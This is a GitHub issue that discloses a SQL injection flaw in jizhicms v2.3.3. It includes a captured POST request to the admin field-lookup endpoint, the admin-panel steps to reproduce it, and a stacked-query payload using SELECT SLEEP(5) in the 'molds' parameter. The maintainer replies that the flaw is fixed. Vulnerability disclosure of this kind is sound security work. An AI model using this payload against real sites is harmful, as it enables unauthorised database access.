Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
This is one of my favorite CMS, but I found a system vulnerability. name:jizhicms version: v2.3.3 Installation package download: Problematic packets:
POST /index.php/admins/Fields/get_fields.html HTTP/1.1 Host: 192.168.23.130:49158 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 21 Origin: http://192.168.23.130:49158 Connection: close Referer: http://192.168.23.130:49158/index.php/admins/Extmolds/editmolds/id/1/molds/tags.html Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs molds=tags&tid=0&id=1
POST /index.php/admins/Fields/get_fields.html HTTP/1.1 Host: 192.168.23.130:49158 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 21 Origin: http://192.168.23.130:49158 Connection: close Referer: http://192.168.23.130:49158/index.php/admins/Extmolds/editmolds/id/1/molds/tags.html Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs
molds=tags&tid=0&id=1
Background ->SEO settings ->TGA list ->edit, and then capture packages
Vulnerability verification exists
payload
Parameter: molds (POST) Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: molds=tags;SELECT SLEEP(5)#&tid=0&id=3
The text was updated successfully, but these errors were encountered:
感谢!已修复
Sorry, something went wrong.
No branches or pull requests
This is one of my favorite CMS, but I found a system vulnerability.

name:jizhicms
version: v2.3.3
Installation package download:
Problematic packets:
Background ->SEO settings ->TGA list ->edit, and then capture packages


Vulnerability verification exists
payload
The text was updated successfully, but these errors were encountered: